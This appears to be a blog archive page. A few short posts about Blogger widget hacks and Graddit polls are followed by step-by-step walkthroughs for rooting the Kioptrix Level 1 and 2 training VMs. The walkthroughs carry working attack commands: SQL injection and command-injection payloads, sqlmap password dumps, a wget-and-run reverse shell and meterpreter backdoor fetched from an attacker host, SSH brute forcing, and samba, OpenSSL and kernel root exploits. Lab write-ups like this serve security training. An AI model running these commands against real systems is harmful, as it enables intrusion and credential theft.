Posted by wanasta
Jumat, 21 September 2012
0 comments
Blogger Dynamic Views are cool, but they support only few official widgets. Today we're hacking dynamic views to support any custom widgets (using Graddit widget as an example, of course).
Disclaimer. This is dirty hacking, it can stop working at any time and can even negatively affect behaviour of your blog. You were warned.
So, the goal is to make widgets appear when user expands a post in any view (Classic, Flipcard, Magazine, Mosaic, Sidebar, Snapshot and Timeline).
First, open Blogger dashboard and go to Template tab; click Edit HTML and then Proceed button.
For dynamic views we can't change a part of the template that displays posts - it will not work. But we still can change head section. Add the following lines to <head>...</head>:
These are styles and some cool scripts. Actually, we will need only one function called gradditBloggerDynamicViewsRatingsHack. Now go to the very bottom of the template and add this call just before closing </body> tag:
Now save template and close editor. Click Customize button to add some styles (without them stars will not show properly). Select Advanced and then click Add CSS. Add this:
Posted by wanasta
Minggu, 16 September 2012
1 comment
Graddit presents new widgets for polls that you can build into your blogs and sites. Here's a simple poll example:
{[['Bad',' | '],['Average',' | '],['Awesome']]}
Number of options and text can be changed. Take code from graddit page, options are set like this:
{[['Bad',' | '],['Average',' | '],['Awesome']]}, where ' | ' are the separators between options; number of options should match the number that is passed to the script as a parameter (3 in this example).
I can be not just text, but any HTML valid element. For example, images:
Who rocks?
{[['',' '], ['',' '], ['']]}
And of course general polls. How do you like the new widgets?
Posted by wanasta
Senin, 03 September 2012
0 comments
There's a new tab in admin panel called "Statistics" that allows you to see detailed data about ratings, views, votes and feedbacks numbers. Also you could get some interesting details such as Google Pagerank, Alexa Rank, Facebook and Twitter mentions (later this will be extended). Here's the tab screenshot:
It's sortable. To get information about a page click corresponding ⟳ link. Leave your suggestions here in comments.
Posted by wanasta
Minggu, 19 Agustus 2012
0 comments
Hi everyone, in this post I will explain how to get root on Kioptrix LEVEL 2. Lets start with the basics, nmap!
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-13 10:30 BST Nmap scan report for 172.16.1.189 Host is up (0.021s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.52 ((CentOS)) 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) 443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS)) 631/tcp open ipp CUPS 1.1 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:50:56:AF:62:3F (VMware) Ok , so for this one ,lets try to access apache on that ip address Open your browser and and type the ip address of your kioptrix, in my case is http://172.16.1.189 As you can see there is a login webpage , we don't know the user/password, but we can guess, OR try to do a sql injection, in my case, I am doing the sql injection, so on the username field, type : admin , and on the password field type : ' OR 1=1 -- - If you want to dig a bit more on the sql injection side of things, we can use sqlmap to fetch some information from the database. Here are some examples: 1) Available databases : ./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --dbs Result: available databases [2]: [*] `test\_%` [*] test 2) Identify the current database ./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --current-db Result : current database: 'webapp' 3) Find all mysql users passwords ./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --passwords Result : [*] john [1]: password hash: 5a6914ba69e02807 [*] root [1]: password hash: 5a6914ba69e02807 And so on. You can also have a sql shell on the server if you want. ./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --sql-shell >select * from users; [2]: [*] 1, 5afac8d85f, admin [*] 2, 66lajGGbla, john
Now, coming back to the browser you can see a new web page saying that you can ping a machine on the network, that means we can execute commands and if not properly configured, we can run more than just "ping". Lets try ping first, then we can try something else. If you typed your ip address on that box, you will be forwarded to http://172.16.1.189/pingit.php That's the one we need to look now. So, instead just ping, lest try to add something else to the command like "; cat /etc/passwd" and see what happens.As you can see, we can read the /etc/passwd, that means we have a webshell to the server and now we can execute anything ( almost ;) ) , so lets upload our backdoor to the server. We can do this in many ways, I will me explaining the 2 methods: 1) Upload a reverse shell ( the easyest way) 172.16.1.1 ; wget -O /tmp/reverse_shell http://172.16.1.79/exploits/reverse_shell2 2) Change permission to execute. 172.16.1.1 ; chmod 777 /tmp/reverse_shell 3) Prepare your BT server for the connection nc -l -p 10000 4)And now run the reverse_shell 172.16.1.1 ; /tmp/reverse_shell Done, now we have shell, we can try the same using backtrack. 1) We need to start apache : /etc/init.d/apache2 start 2) We need to create our backdoor: LHOST : IP of your backtrack LPORT : Port that backtrack will be listening to /var/www/backdoor.php.txt : That's where it will save your backdoor. So the complete command is : msfpayload php/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8080 R > /var/www/backdoor.php.txt
Now, we need to start our session handler.
msfconsole use multi/handler search php set PAYLOAD php/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 8080 exploit -j -z Leave this one running and open open another shell on your backtrack. We need to edit our backdoor.php.txt ( script kid stuff) vi /var/www/backdoor.php.txt. Remove "#" from the first line and save it.
Next step is to insert this in our ping command line . 172.16.1.1 ; cd /tmp ; wget -O backdoor.php 172.16.1.79/backdoor.php.txt ; php -f backdoor.php If you look into that other shell, you should be reading this by now : [*] Sending stage (39217 bytes) to 172.16.1.189 [*] Meterpreter session 4 opened (172.16.1.79:8080 -> 172.16.1.189:32807) at 2012-08-13 14:12:00 +0100 meterpreter > Great, now that we have access to the box, we need to get root. uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Or ... you can search inside backtrack. /pentest/exploits/exploitdb/searchsploit kernel linux local And that's the one you are looking for Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit /linux/local/9435.txt Again, you can try other exploits as well. Now that you have the exploit, compile it and run it on the target machine. wget http://172.16.1.79/exploits/ip_append_data.c gcc -o get_root ip_append_data.c ./get_root sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache)
Posted by wanasta
Minggu, 12 Agustus 2012
0 comments
Hi folks, ok, another option that we have to break into kioptix level 1, is bruteforce ssh, its quite simple, but takes a LOT of time if you are unlucky. Here is how you can crack down via bruteforce. In your backtrack type: cd /pentest/passwords/wordlists/ hydra -l root -P rockyou.txt -t 3 -o login.pwd 172.16.1.144 ssh Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-08 13:33:19 [DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 172.16.1.144 login: root password: 123456 [STATUS] attack finished for 172.16.1.144 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-08 13:33:36
As you can see, it found the pasword 123456 for the user root.
PS : I changed the root password to 123456 for this demonstration only.
Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA) Hi everyone, this is the second part of the level 1, now we are going to exploit samba. As you remember from the last video, we managed to get root using an SSL exploit for apache, now its time to exploit a samba vulnerabilities. So, lets start. First, lets run an nmap nmap -sV 172.16.1.144 Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-07 11:12 BST Nmap scan report for 172.16.1.144 Host is up (0.00068s latency). PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) MAC Address: 00:50:56:AF:5A:B9 (VMware) Ok, this output doesn't tell the version of samba, but we can try two commands to list the version : 1) smbclient -L 172.16.1.144 Result : Enter root's password: Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] Sharename Type Comment --------- ---- ------- cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport IPC$ IPC IPC Service (Samba Server) ADMIN$ Disk IPC Service (Samba Server) Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
2) smbclient //172.16.1.144/IPC$ Result: Enter root's password: Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] tree connect failed: ERRnosuchshare Ok, now we know its running version 2.2.1a, lets try to find an exploit for it. If you google for "samba 2.2.1a" exploit You will find this exploit http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c So.. lets go back to our backtrack , download and compile it. wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c gcc -o exploit 0x333hate.c ./exploit -t 172.16.1.144 Result : [~] 0x333hate => samba 2.2.x remote root exploit [~] [~] coded by c0wboy ~ www.0x333.org [~] [-] connecting to 172.16.1.144:139 [-] stating bruteforce [-] testing 0xbfffffff [-] testing 0xbffffdff [-] testing 0xbffffbff [-] testing 0xbffff9ff [-] testing 0xbffff7ff Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown uid=0(root) gid=0(root) groups=99(nobody)
There is another way to exploit this samba using metasploit. Lets try that. msfconsole search samba use linux/samba/trans2open show options set RHOST 172.16.1.144 show payloads set PAYLOAD linux/x86/shell/bind_tcp show options exploit [*] Started bind handler [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Sending stage (36 bytes) to 172.16.1.144 [*] Trying return address 0xbffff9fc... [*] Command shell session 1 opened (172.16.1.79:52832 -> 172.16.1.144:4444) at 2012-08-07 11:51:46 +0100 id uid=0(root) gid=0(root) groups=99(nobody)
Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE) Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1 .But what is kioptrix? Its a linux distro with lots of vulnerabilities, so we can play and test our knowledgement. To download, go to : http://www.kioptrix.com/blog/?page_id=135 , and use vmware player to open the files and you are ready to go.So, now that's everything up and running, we need to discover the IP address of the target machine because it gets via DHCP from your network ( by the way, you need a DHCP server in order for this to work). To find out what's the IP address , lets run an nmap on our network that will look for live hosts.
# nmap -sn 172.16.1.0/24 Nmap scan report for 172.16.1.144 Host is up (0.0010s latency). MAC Address: 00:50:56:AF:5A:B9 (VMware)
Great, now that we found it the IP address, lets see what's running in the host.
#nmap -sV 172.16.1.144
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-03 16:47 BST Nmap scan report for 172.16.1.144 Host is up (0.033s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 1024/tcp open status (status V1) 1 (rpc #100024) MAC Address: 00:50:56:AF:5A:B9 (VMware)
Ok, at this point there is a lot to do. We need to find if the running version of each open port has an exploit for the version.To get the proper version and vulnerability ID, lets use nikto to scan the host. I am not going to explain all vulnerabilities of the distro, I think two is good enough, you guys can try for your self's other ways to break into. So I am going to show how to break in using apache and samba. 1) cd /pentest/web/nikto/ 2) ./nikto.pl -host 172.16.1.144 3) The results (The intersting bits) : + Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b + OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839. + OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542. + mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
Right, now we need to google it for the CVEs or you can search for the exploit on backtrack itself. Run: /pentest/exploits/exploitdb/searchsploit apache linux remote Webfroot Shoutbox < 2.32 (Apache) Remote Exploit /linux/remote/34.pl Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl /linux/remote/38.pl Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit /linux/remote/126.c Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit /linux/remote/132.c Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield) /linux/remote/4162.c Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) /linux/remote/4552.pl Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt
As you can see, there is one for OpenSSL (764.c) OpenFuck. Now, because this is really old, you need to change the exploit a bit in order to make it work. 1) Add: #include <openssl rc4.h> 2) Add: #include <openssl md5.h> 3) Search inside the exploit for "wget" and change the url for the correct one because that is not valid anymore. If you google it for ptrace-kmod.c , you will find that the correct address is : http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c So, just change that on the exploit, save it . Now we need to compile it, but before that, we need install the ssl-dev libraries. Run : apt-get install libssl-dev cd /pentest/exploits/exploitdb/platforms/linux/remote gcc -o OpenFuck 764.c -lcrypto Run the exploit now ./OpenFuck Look for the target, we know that its running apache on a redhat, and that is running 1.3.20 so lets filter that: ./OpenFuck | grep -i redhat | grep "1.3.20" That limits the results to only two 0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 So we can try first the target as 0x6a and if that doesn't work, we can try 0x6b. ./OpenFuck 0x6a 172.16.1.144 443 Result : Establishing SSL connection cipher: 0x4043808c ciphers: 0x80fc3f0 Ready to send shellcode Spawning shell... Good Bye!
As you can see, that did not worked. Lets try the other one now. ./OpenFuck 0x6b 172.16.1.144 443 Result: Establishing SSL connection cipher: 0x4043808c ciphers: 0x80f83c0 Ready to send shellcode Spawning shell... bash: no job control in this shell bash-2.05$o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; ttp://172.16.1.79/ptrace-kmod.c; gcc - --09:18:29-- http://172.16.1.79/ptrace-kmod.c => `ptrace-kmod.c' Connecting to 172.16.1.79:80... connected! HTTP request sent, awaiting response... 200 OK Length: 3,921 [text/x-csrc] 0K ... 100% @ 3.74 MB/s 09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921] [+] Attached to 17426 [+] Waiting for signal [+] Signal caught [+] Shellcode placed at 0x4001189d [+] Now wait for suid shell... id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Success !! We got root on the box. In the next video I will demonstrate how to hack using samba.